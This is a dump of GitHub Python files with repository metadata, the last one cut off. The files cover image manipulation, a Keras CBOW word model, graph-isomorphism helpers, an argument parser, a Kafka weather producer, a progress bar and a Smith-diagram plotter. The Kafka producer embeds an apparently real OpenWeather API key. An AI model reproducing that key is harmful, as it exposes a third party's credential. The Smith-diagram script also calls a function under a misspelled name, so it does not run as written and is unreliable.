"line_number": 87, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 89, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 96, "usage_type": "call"}, {"api_name": "truck.package_list", "line_number": 96, "usage_type": "attribute"}, {"api_name": "truck.departure_time", "line_number": 97, "usage_type": "attribute"}, {"api_name": "truck.current_address", "line_number": 98, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 105, "usage_type": "call"}, {"api_name": "package.address", "line_number": 105, "usage_type": "attribute"}, {"api_name": "truck.mileage", "line_number": 106, "usage_type": "attribute"}, {"api_name": "package.address", "line_number": 106, "usage_type": "attribute"}, {"api_name": "package.address", "line_number": 107, "usage_type": "attribute"}, {"api_name": "package.delivery_time", "line_number": 109, "usage_type": "attribute"}, {"api_name": "package.departure_time", "line_number": 110, "usage_type": "attribute"}, {"api_name": "truck.departure_time", "line_number": 110, "usage_type": "attribute"}, {"api_name": "package.address", "line_number": 123, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 169, "usage_type": "call"}]}
+{"seq_id": "18679274677", "text": "#####################\n# Zadatak 3 #\n#####################\n\n\"\"\"\n Na temelju primjera 2.6. učitajte sliku 'tiger.png'. Manipulacijom odgovarajuće numpy matrice pokušajte:\n a) posvijetliti sliku (povećati brightness),\n b) zarotirati sliku za 90 stupnjeva u smjeru kazaljke na satu,\n c) zrcaliti sliku,\n d) smanjiti rezoluciju slike x puta (npr. 10 puta),\n e) prikazati samo drugu četvrtinu slike po širini, a prikazati sliku cijelu po visini; ostali dijelovi slike trebaju biticrni.\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef show(img):\n plt.figure()\n plt.imshow(img, cmap=\"gray\")\n plt.show()\n\n# read the image into a buffer\nimg = plt.imread(\"../assets/images/tiger.png\", \"png\")\n\n# copy the image into a gray-scale buffer\nimg = img[:, :, 0].copy()\n\n# get the width & the height of the image\nheight, width = img.shape\n\n# show the base image\nshow(img)\n\n# increasing the brightness\nfor i in range(0, len(img)):\n for j in range(0, len(img[i])):\n img[i][j] = img[i][j] * 1.75\n if (img[i][j] > 1.0):\n img[i][j] = 1.0\nshow(img)\n\n# rotate the image 90deg clockwise\nrotated_img = np.zeros((width, height))\nfor y in range(height):\n rotated_img[:, height - 1 - y] = img[y, :]\nshow(rotated_img)\n\n# mirror the image\nrotated_img = np.zeros((height, width))\nfor y in range(height):\n rotated_img[y] = img[height - 1 - y]\nshow(rotated_img)\n\n# scaled down the image\nshow(img[::10, ::10])\n\n# clip the image\nclipped_img = np.zeros((height, width))\nclip_size = width // 4\nclipped_img[:, clip_size : clip_size * 2] = img[:, clip_size : clip_size * 2]\nshow(clipped_img)", "repo_name": "Mat1337/ferit", "sub_path": "machine-lerning/lab_2/zad_3.py", "file_name": "zad_3.py", "file_ext": "py", "file_size_in_byte": 1656, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imread", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 58, "usage_type": "call"}]}
+{"seq_id": "12733317339", "text": "from keras.preprocessing import text\nfrom keras.utils import np_utils\nfrom keras.preprocessing import sequence\nimport keras.backend as K\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Embedding, Lambda\nfrom keras.models import load_model\nfrom ...lib.utils import word2id, id2word, model, model_path, PreProcess\nimport numpy as np\nimport distance\nimport pickle\n\npre_process = PreProcess()\n\ndef generate_context_word_pairs(wids, vocab_size):\n context_data = []\n label_data = []\n for data in wids:\n context_data.append(data[1:])\n label_data.append(data[0])\n x = sequence.pad_sequences(context_data, maxlen=15)\n y = np_utils.to_categorical(label_data, vocab_size)\n return x, y\n\n\ndef word_train(text_data):\n \"\"\"\n Input : text_data :- List of Setences\n \"\"\"\n try:\n text_data = [pre_process(sent) for sent in text_data]\n tokenizer = text.Tokenizer()\n tokenizer.fit_on_texts(text_data)\n word2id = tokenizer.word_index\n word2id['PAD'] = 0\n id2word = {v:k for k, v in word2id.items()}\n wids = [[word2id[w] for w in text.text_to_word_sequence(doc)] for doc in text_data]\n vocab_size = len(word2id)\n embed_size = 100\n \n context_data, label_data = generate_context_word_pairs(wids, vocab_size)\n \n cbow = Sequential()\n cbow.add(Embedding(input_dim=vocab_size, output_dim=embed_size, input_length=15))\n cbow.add(Lambda(lambda x: K.mean(x, axis=1), output_shape=(embed_size,)))\n cbow.add(Dense(vocab_size, activation='softmax'))\n cbow.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n \n cbow.fit(context_data, label_data, epochs=30, batch_size=10, verbose=2)\n with open('model_path/word_id.pkl', 'wb') as f:\n pickle.dump(word2id, f)\n with open('model_path/id_word.pkl', 'wb') as f:\n pickle.dump(id2word, f)\n cbow.save(\"model_path/cbow_model.h5\")\n return True\n except Exception as e:\n raise Exception(e) \n\n\ndef get_candidate_words(doc, masked_word):\n \"\"\"\n Input text:- Defination of word\n masked_word:- masked character word\n output word:- generate list of candidate words based on Model and words \n are same length as of Masked character word\n \"\"\"\n candidate_words = []\n wids = [word2id[w] for w in text.text_to_word_sequence(doc)]\n d = sequence.pad_sequences([wids], maxlen=15)\n predictied_prob = model.predict(d)\n id_index = np.argsort(predictied_prob[0])[::-1][0:10]\n for ids in id_index:\n word = id2word[ids]\n if len(word) == len(masked_word):\n candidate_words.append(word)\n return candidate_words\n\ndef get_correct_word(masked_word, candidate_words):\n \"\"\"\n Input masked_word:- maksed character word\n candidate_words :- list of canddate word\n output:- Corrected word based on Hamming distance\n \"\"\"\n distances = []\n for word in candidate_words:\n distances.append(distance.hamming(masked_word, word))\n return candidate_words[distances.index(min(distances))]\n\n", "repo_name": "MAYUR192/nlp_chardes", "sub_path": "app/api/models/word_model.py", "file_name": "word_model.py", "file_ext": "py", "file_size_in_byte": 3146, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "lib.utils.PreProcess", "line_number": 13, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 21, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence", "line_number": 21, "usage_type": "name"}, {"api_name": "keras.utils.np_utils.to_categorical", "line_number": 22, "usage_type": "call"}, {"api_name": "keras.utils.np_utils", "line_number": 22, "usage_type": "name"}, {"api_name": "keras.preprocessing.text.Tokenizer", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.preprocessing.text", "line_number": 32, "usage_type": "name"}, {"api_name": "lib.utils.word2id", "line_number": 34, "usage_type": "name"}, {"api_name": "lib.utils.word2id", "line_number": 35, "usage_type": "name"}, {"api_name": "lib.utils.id2word", "line_number": 36, "usage_type": "name"}, {"api_name": "lib.utils.word2id.items", "line_number": 36, "usage_type": "call"}, {"api_name": "lib.utils.word2id", "line_number": 36, "usage_type": "name"}, {"api_name": "lib.utils.word2id", "line_number": 37, "usage_type": "name"}, {"api_name": "keras.preprocessing.text.text_to_word_sequence", "line_number": 37, "usage_type": "call"}, {"api_name": "keras.preprocessing.text", "line_number": 37, "usage_type": "name"}, {"api_name": "lib.utils.word2id", "line_number": 38, "usage_type": "argument"}, {"api_name": "keras.models.Sequential", "line_number": 43, "usage_type": "call"}, {"api_name": "keras.layers.Embedding", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.layers.Lambda", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.backend.mean", "line_number": 45, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 45, "usage_type": "name"}, {"api_name": "keras.layers.Dense", "line_number": 46, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 51, "usage_type": "call"}, {"api_name": "lib.utils.word2id", "line_number": 51, "usage_type": "argument"}, {"api_name": "pickle.dump", "line_number": 53, "usage_type": "call"}, {"api_name": "lib.utils.id2word", "line_number": 53, "usage_type": "argument"}, {"api_name": "lib.utils.word2id", "line_number": 68, "usage_type": "name"}, {"api_name": "keras.preprocessing.text.text_to_word_sequence", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.preprocessing.text", "line_number": 68, "usage_type": "name"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 69, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence", "line_number": 69, "usage_type": "name"}, {"api_name": "lib.utils.model.predict", "line_number": 70, "usage_type": "call"}, {"api_name": "lib.utils.model", "line_number": 70, "usage_type": "name"}, {"api_name": "numpy.argsort", "line_number": 71, "usage_type": "call"}, {"api_name": "lib.utils.id2word", "line_number": 73, "usage_type": "name"}, {"api_name": "distance.hamming", "line_number": 86, "usage_type": "call"}]}
+{"seq_id": "74157575768", "text": "import networkx as nx\nimport typing\nimport numpy as np\nfrom general_utils import Attribute\nfrom pprint import pprint as pp\n\n\ndef find_parents(graph: nx.Graph, level: int, label: str) -> list:\n parents = []\n for node in graph.nodes:\n if (\n graph.nodes[node][Attribute.LEVEL] == level - 1\n and graph.nodes[node][Attribute.LABEL] == label\n ):\n parents.append(node)\n return parents\n\n\ndef node_comparator(found_node, searched_node) -> bool:\n return found_node[Attribute.LABEL] == searched_node[Attribute.LABEL]\n\n\ndef node_comparator_factory(level: int) -> typing.Callable:\n def node_comparator(found_node, searched_node) -> bool:\n desired_level = level + searched_node.get(Attribute.LEVEL, 0)\n return (\n found_node[Attribute.LEVEL] == desired_level\n and found_node[Attribute.LABEL] == searched_node[Attribute.LABEL]\n )\n\n return node_comparator\n\n\ndef find_isomporphic(graph: nx.Graph, left_side_graph: nx.Graph, level: int) -> dict:\n isomorphic_graphs = []\n graph_matcher = nx.algorithms.isomorphism.GraphMatcher(\n graph, left_side_graph, node_match=node_comparator_factory(level)\n )\n for isomorphic_graph in graph_matcher.subgraph_isomorphisms_iter():\n # mapping should be directed from template to real graph:\n inversed_isomorphism = {v: k for k, v in isomorphic_graph.items()}\n isomorphic_graphs.append(inversed_isomorphism)\n return isomorphic_graphs\n\n\ndef find_isomorphic_wrapper(\n graph: nx.Graph, left_side_graph: nx.Graph, level: int, constraints: list = None\n) -> dict:\n \"\"\"\n constraints refer to node in left_side_graph.\n Example constraints:\n [{\n 'first_node': 1,\n 'second_node': 2,\n 'constrained_middle_node': 3\n },\n {\n 'node': 4,\n 'constrained_equal_node': 5\n }]\n\n x of 'constrained_middle_node' == (x of 'first_node' + x of 'second_node') / 2\n y of 'constrained_middle_node' == (y of 'first_node' + y of 'second_node') / 2\n x of 'node' == x of 'constrained_equal_node'\n y of 'node' == y of 'constrained_equal_node'\n \"\"\"\n\n def predicate(mapping):\n eps = 1e-4\n checked_constraints = [False for _ in range(len(constraints))]\n\n def check_middle_node_constraint(constraint, i):\n first_node = graph.nodes[mapping[constraint[\"first_node\"]]]\n second_node = graph.nodes[mapping[constraint[\"second_node\"]]]\n expected_node = graph.nodes[mapping[constraint[\"constrained_middle_node\"]]]\n x1, y1 = first_node[Attribute.X], first_node[Attribute.Y]\n x2, y2 = second_node[Attribute.X], second_node[Attribute.Y]\n x3, y3 = expected_node[Attribute.X], expected_node[Attribute.Y]\n if np.abs((x1 + x2) / 2 - x3) < eps and np.abs((y1 + y2) / 2 - y3) < eps:\n checked_constraints[i] = True\n\n def check_equal_nodes_constraint(constraint, i):\n first_node = graph.nodes[mapping[constraint[\"node\"]]]\n second_node = graph.nodes[mapping[constraint[\"constrained_equal_node\"]]]\n x1, y1 = first_node[Attribute.X], first_node[Attribute.Y]\n x2, y2 = second_node[Attribute.X], second_node[Attribute.Y]\n if np.abs(x1 - x2) < eps and np.abs(y1 - y2) < eps:\n checked_constraints[i] = True\n\n for i, constraint in enumerate(constraints):\n constraint_keys = list(constraint.keys())\n if constraint_keys == [\n \"first_node\",\n \"second_node\",\n \"constrained_middle_node\",\n ]:\n check_middle_node_constraint(constraint, i)\n elif constraint_keys == [\"node\", \"constrained_equal_node\"]:\n check_equal_nodes_constraint(constraint, i)\n else:\n raise Exception(\"Invalid constraint\")\n\n return all(checked_constraints)\n\n initially_found = find_isomporphic(graph, left_side_graph, level)\n\n # modify later here to add ability to choose which mapping to use\n try:\n return (\n initially_found[0]\n if constraints is None\n else list(filter(predicate, initially_found))[0]\n )\n except IndexError as e:\n return None\n\n\ndef add_to_graph(\n graph: nx.Graph,\n isomorphic_mapping: dict,\n right_side_parent_node: tuple,\n right_side_nodes_new: list,\n right_side_edges: list,\n):\n parent_tmp_node_number = right_side_parent_node[0]\n\n n = len(graph.nodes)\n # find max node number in graph\n for node in graph.nodes:\n n = max(n, node)\n\n right_side_nodes_mapping = {\n node[0]: node[0] + n for node in right_side_nodes_new\n } # define a dictionay mapping old node number (based on right_side_nodes ) => graph node.\n right_side_nodes_mapping[parent_tmp_node_number] = isomorphic_mapping[\n parent_tmp_node_number\n ]\n\n right_side_edges_mapped = list(\n map(\n lambda edge: (\n right_side_nodes_mapping[edge[0]],\n right_side_nodes_mapping[edge[1]],\n ),\n right_side_edges,\n )\n )\n\n right_size_edges_to_parent = [\n (isomorphic_mapping[parent_tmp_node_number], right_side_nodes_mapping[node[0]])\n for node in list(\n filter(lambda node: node[1][Attribute.LABEL] == \"I\", right_side_nodes_new)\n )\n ]\n\n right_side_edges_mapped = right_side_edges_mapped + right_size_edges_to_parent\n\n right_side_nodes_mapped = list(\n map(\n lambda node: (right_side_nodes_mapping[node[0]], node[1]),\n right_side_nodes_new,\n )\n )\n\n existing_node_parent = graph.nodes[isomorphic_mapping[parent_tmp_node_number]]\n\n for node in right_side_nodes_mapped:\n node[1][Attribute.LEVEL] = existing_node_parent[Attribute.LEVEL] + 1\n\n graph.nodes[isomorphic_mapping[parent_tmp_node_number]][\n Attribute.LABEL\n ] = right_side_parent_node[1][Attribute.LABEL]\n\n graph.add_nodes_from(right_side_nodes_mapped)\n graph.add_edges_from(right_side_edges_mapped)\n\n\ndef merge_nodes(graph: nx.Graph, nodes: list, new_node: tuple):\n graph_edges = graph.copy().edges()\n for n in nodes:\n graph.remove_node(n)\n\n graph.add_nodes_from([new_node])\n\n for n1, n2 in graph_edges:\n if n1 in nodes:\n graph.add_edge(new_node[0], n2)\n elif n2 in nodes:\n graph.add_edge(n1, new_node[0])\n", "repo_name": "maciejsikora2302/GramatykiGrafoweGrupa2Sroda1630", "sub_path": "graph_functions.py", "file_name": "graph_functions.py", "file_ext": "py", "file_size_in_byte": 6526, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "networkx.Graph", "line_number": 8, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute.LEVEL", "line_number": 12, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 12, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LABEL", "line_number": 13, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 13, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LABEL", "line_number": 20, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 20, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LEVEL", "line_number": 25, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 25, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LEVEL", "line_number": 27, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 27, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LABEL", "line_number": 28, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 23, "usage_type": "attribute"}, {"api_name": "networkx.Graph", "line_number": 34, "usage_type": "attribute"}, {"api_name": "networkx.algorithms.isomorphism.GraphMatcher", "line_number": 36, "usage_type": "call"}, {"api_name": "networkx.algorithms", "line_number": 36, "usage_type": "attribute"}, {"api_name": "networkx.Graph", "line_number": 47, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute.X", "line_number": 76, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 76, "usage_type": "name"}, {"api_name": "general_utils.Attribute.Y", "line_number": 76, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute.X", "line_number": 77, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 77, "usage_type": "name"}, {"api_name": "general_utils.Attribute.Y", "line_number": 77, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute.X", "line_number": 78, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 78, "usage_type": "name"}, {"api_name": "general_utils.Attribute.Y", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 79, "usage_type": "call"}, {"api_name": "general_utils.Attribute.X", "line_number": 85, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 85, "usage_type": "name"}, {"api_name": "general_utils.Attribute.Y", "line_number": 85, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute.X", "line_number": 86, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 86, "usage_type": "name"}, {"api_name": "general_utils.Attribute.Y", "line_number": 86, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 87, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 119, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute.LABEL", "line_number": 152, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 152, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LEVEL", "line_number": 168, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 168, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LABEL", "line_number": 171, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 171, "usage_type": "name"}, {"api_name": "general_utils.Attribute.LABEL", "line_number": 172, "usage_type": "attribute"}, {"api_name": "general_utils.Attribute", "line_number": 172, "usage_type": "name"}, {"api_name": "networkx.Graph", "line_number": 178, "usage_type": "attribute"}]}
+{"seq_id": "35200288799", "text": "\"\"\"Align target text to reference translation.\n\"\"\"\nimport argparse\n\nWINDOW_SIZE = 30\nMAX_THRESHOLD = 0.9\nMIN_THRESHOLD = 0.4\nVOCAB = 'glove.840B.300d'\nPROGRESS = False\nDEVICE = 'cpu'\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\n '--target', '-t', required=True,\n help='The target text file to align.')\n parser.add_argument(\n '--reference', '-r', required=True,\n help='The reference translation to align to.')\n parser.add_argument(\n '--output', '-o', required=True,\n help='The output file to write the aligned target text.')\n\n parser.add_argument(\n '--window_size', '-w', type=int, default=WINDOW_SIZE,\n help='The number of reference sentences to compare per target.')\n parser.add_argument(\n '--max_threshold', type=float, default=MAX_THRESHOLD,\n help='The ABLEU threshold to assume best matching sentences.')\n parser.add_argument(\n '--min_threshold', type=float, default=MIN_THRESHOLD,\n help='The minimum ABLEU score for valid alignment.')\n parser.add_argument(\n '--vocab', '-v', default=VOCAB,\n help='The pretrained alias from `torchtext.vocab` to use.')\n parser.add_argument(\n '--cache_dir',\n help='The directory to save vocabulary cache.')\n parser.add_argument(\n '--progress', '-p', action='store_true', default=PROGRESS,\n help='Show progress bar.')\n parser.add_argument(\n '--device', '-d', default=DEVICE,\n help='The `torch.device` value to use in calculations.')\n\n return parser\n", "repo_name": "juneoh/ABLEUAlign", "sub_path": "ableualign/args.py", "file_name": "args.py", "file_ext": "py", "file_size_in_byte": 1686, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 16, "usage_type": "attribute"}]}
+{"seq_id": "39060022021", "text": "from kafka import KafkaProducer\nfrom OpenWeatherApi import OpenWeatherApi\nimport json\nimport time\nfrom multiprocessing import Manager\n\nclass Producer:\n \"\"\"A kafka prodcuer\n calls is an auto incremented variable that tracks the number of api calls.\n timeout is the timeout in between calls of the same city\"\"\"\n def __init__(self, apikey, cityidlist, bootstrap_server='0.0.0.0:9092', timeout=2) -> None:\n self.calls = 0\n self.timeout = timeout\n self.apikey = apikey\n self.cityidlist = [] if cityidlist == None else cityidlist\n self.producer = KafkaProducer(bootstrap_servers=bootstrap_server)\n\n\n def city_exists(self, cityid) -> bool:\n \"\"\"checks whether the provided city topic is being produced to\"\"\"\n return cityid in self.cityidlist\n \n def produce(self):\n \"\"\"production loop\"\"\"\n try :\n # main producing loop\n while True:\n for cityid in self.cityidlist:\n api = OpenWeatherApi(params = {\n 'id': cityid,\n 'units': 'metric',\n 'appid': self.apikey\n })\n jsonpaylode = api.get()\n self.calls += 1\n\n # jsonpaylode = json.dumps(jsonpaylode, indent=2).encode('utf-8')\n # make it async\n self.producer.send(str(cityid), jsonpaylode.content)\n\n print('producing...')\n time.sleep(self.timeout)\n except KeyboardInterrupt :\n print('bye')\n\nif __name__ == '__main__':\n prod = Producer(\"db1ac472d1dd9cf2d4cd31a077113ee9\", [2467959])\n prod.produce()", "repo_name": "Capital2/Weather-kafka", "sub_path": "Backend/app/modules/producers/Producer.py", "file_name": "Producer.py", "file_ext": "py", "file_size_in_byte": 1713, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "kafka.KafkaProducer", "line_number": 16, "usage_type": "call"}, {"api_name": "OpenWeatherApi.OpenWeatherApi", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "37191967574", "text": "from contextlib import contextmanager\nfrom itertools import cycle\nimport os\nfrom time import monotonic\nfrom .scheduler import run_soon, sleep\n\nUPDATE_INTERVAL = .1\nSPINNER = cycle(\"___-`''´-___\")\nFILL = '█'\nPARTIAL_FILL = ' ▏▎▍▌▋▊▉█'\n\nasync def _progress_bar(duration):\n \"\"\"An asynchronous progress bar that tracks time for `duration` seconds.\n \"\"\"\n bar_length = min(75, os.get_terminal_size()[0] - 58) # 58 is length of non-bar characters printed.\n\n start_time = current_time = monotonic()\n end_time = start_time + duration\n\n while current_time < end_time:\n current_time = monotonic()\n\n if end_time - current_time < UPDATE_INTERVAL:\n current_time = end_time\n elapsed_time = duration\n percent = 1\n else:\n elapsed_time = current_time - start_time\n percent = elapsed_time / duration\n\n fill, partial = divmod(bar_length * percent, 1)\n filled_length, partial_index = int(fill), int(len(PARTIAL_FILL) * partial)\n\n partial_fill = PARTIAL_FILL[partial_index]\n\n bar = f'{FILL * filled_length}{partial_fill}{next(SPINNER)}'.ljust(bar_length, '_')[:bar_length]\n\n print(\n ' | '.join((\n f'[{bar}] {100 * percent:>5.1f}%',\n f'Time Elapsed: {elapsed_time:>5.1f}s',\n f'Time Remaining: {duration - elapsed_time:>5.1f}s',\n )),\n end='\\r'\n )\n\n await sleep(UPDATE_INTERVAL)\n\n@contextmanager\ndef progress_bar(duration):\n \"\"\"Progress bar context manager.\n \"\"\"\n run_soon(_progress_bar(duration))\n print('\\x1b[?25l', end='') # Hide cursor\n\n try:\n yield\n finally:\n print('\\x1b[?25h') # Show cursor and print newline.\n", "repo_name": "salt-die/gract", "sub_path": "gract/progress_bar.py", "file_name": "progress_bar.py", "file_ext": "py", "file_size_in_byte": 1765, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "itertools.cycle", "line_number": 8, "usage_type": "call"}, {"api_name": "os.get_terminal_size", "line_number": 15, "usage_type": "call"}, {"api_name": "time.monotonic", "line_number": 17, "usage_type": "call"}, {"api_name": "time.monotonic", "line_number": 21, "usage_type": "call"}, {"api_name": "scheduler.sleep", "line_number": 47, "usage_type": "call"}, {"api_name": "scheduler.run_soon", "line_number": 53, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 49, "usage_type": "name"}]}
+{"seq_id": "11055177146", "text": "import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom math import tan, radians\r\n\r\nsigma_ak = float(input(\"Please enter sigma_ak: \"))\r\nsigma_D = float(input(\"Please enter sigma_D: \"))\r\nb0 = float(input(\"Please enter b0: \"))\r\nb1 = float(input(\"Please enter b1: \"))\r\nbeta_k = float(input(\"Please enter beta_k: \"))\r\nsigma_vü = float(input(\"Please enter sigma_vü: \"))\r\nsigma_vm = float(input(\"Please enter sigma_vm: \"))\r\n\r\nsigma_ak_prime = sigma_ak*b0\r\nsigma_D_prime = sigma_D*b0\r\nsigma_sd = sigma_D*b0*b1/beta_k\r\ntana = sigma_vü/sigma_vm\r\ntan40 = tan(radians(40))\r\n\r\ndef plot45():\r\n xpoints = np.array([0, sigma_ak+sigma_ak/5])\r\n ypoints = np.array([0, sigma_ak+sigma_ak/5])\r\n\r\n plt.plot(xpoints, ypoints)\r\n\r\ndef plotaxises():\r\n xpoints = np.array([0, sigma_ak+sigma_ak/5])\r\n ypoints = np.array([0, 0])\r\n plt.plot(xpoints, ypoints, color = \"r\", linewidth = \"4\")\r\n\r\n xpoints = np.array([0, 0])\r\n ypoints = np.array([0, sigma_ak+sigma_ak/5])\r\n plt.plot(xpoints, ypoints, color = \"r\", linewidth = \"4\")\r\n\r\ndef sigmaD_to_sigma_ak():\r\n xpoints = np.array([0, (sigma_ak-sigma_D)/tan40])\r\n ypoints = np.array([sigma_D, sigma_ak])\r\n plt.plot(xpoints, ypoints, color = \"b\")\r\n\r\n xpoints = np.array([(sigma_ak-sigma_D)/tan40, sigma_ak])\r\n ypoints = np.array([sigma_ak, sigma_ak])\r\n plt.plot(xpoints, ypoints, color = \"b\")\r\n\r\ndef sigmaDprime_to_sigma_akprime():\r\n xpoints = np.array([0, (sigma_ak_prime-sigma_D_prime)/tan40])\r\n ypoints = np.array([sigma_D_prime, sigma_ak_prime])\r\n plt.plot(xpoints, ypoints, color = \"b\", linestyle = \"dashed\")\r\n\r\n xpoints = np.array([(sigma_ak_prime-sigma_D_prime)/tan40, sigma_ak_prime])\r\n ypoints = np.array([sigma_ak_prime, sigma_ak_prime])\r\n plt.plot(xpoints, ypoints, color = \"b\", linestyle = \"dashed\")\r\n\r\ndef sigma_şd_to():\r\n xpoints = np.array([0, (sigma_ak_prime-sigma_D_prime)/tan40])\r\n ypoints = np.array([sigma_sd, sigma_sd+(sigma_ak_prime-sigma_D_prime)])\r\n plt.plot(xpoints, ypoints, color = \"b\")\r\n\r\n xpoints = np.array([(sigma_ak_prime-sigma_D_prime)/tan40, sigma_ak_prime])\r\n ypoints = np.array([sigma_sd+(sigma_ak_prime-sigma_D_prime), sigma_ak_prime])\r\n plt.plot(xpoints, ypoints, color = \"b\")\r\n\r\ndef plot_tana():\r\n xpoints = np.array([0, sigma_D_prime/tana])\r\n ypoints = np.array([0, sigma_D_prime])\r\n plt.plot(xpoints, ypoints, color = \"green\", linewidth = \"3\")\r\n\r\nsigma_sü = tana*sigma_sd/(tana-tan40)\r\nS = sigma_sü / sigma_vü\r\n\r\ndef plotting():\r\n plot45()\r\n plotaxises()\r\n sigmaD_to_sigma_ak()\r\n sigmaDprime_to_sigma_akprime()\r\n sigma_sd_to()\r\n plot_tana()\r\n\r\n plt.title(\"Smith Diagram\")\r\n plt.xlabel(\"sigma_m (N/mm^2)\")\r\n plt.ylabel(\"sigma (N/mm^2)\")\r\n\r\n plt.show()\r\n\r\n\r\nprint(f\"Safety = {S}\")\r\nplotting()\r\n", "repo_name": "kerembg0/Smith-Diagram-Plotter-and-Factor-of-Safety-Calculator", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2777, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "math.tan", "line_number": 17, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 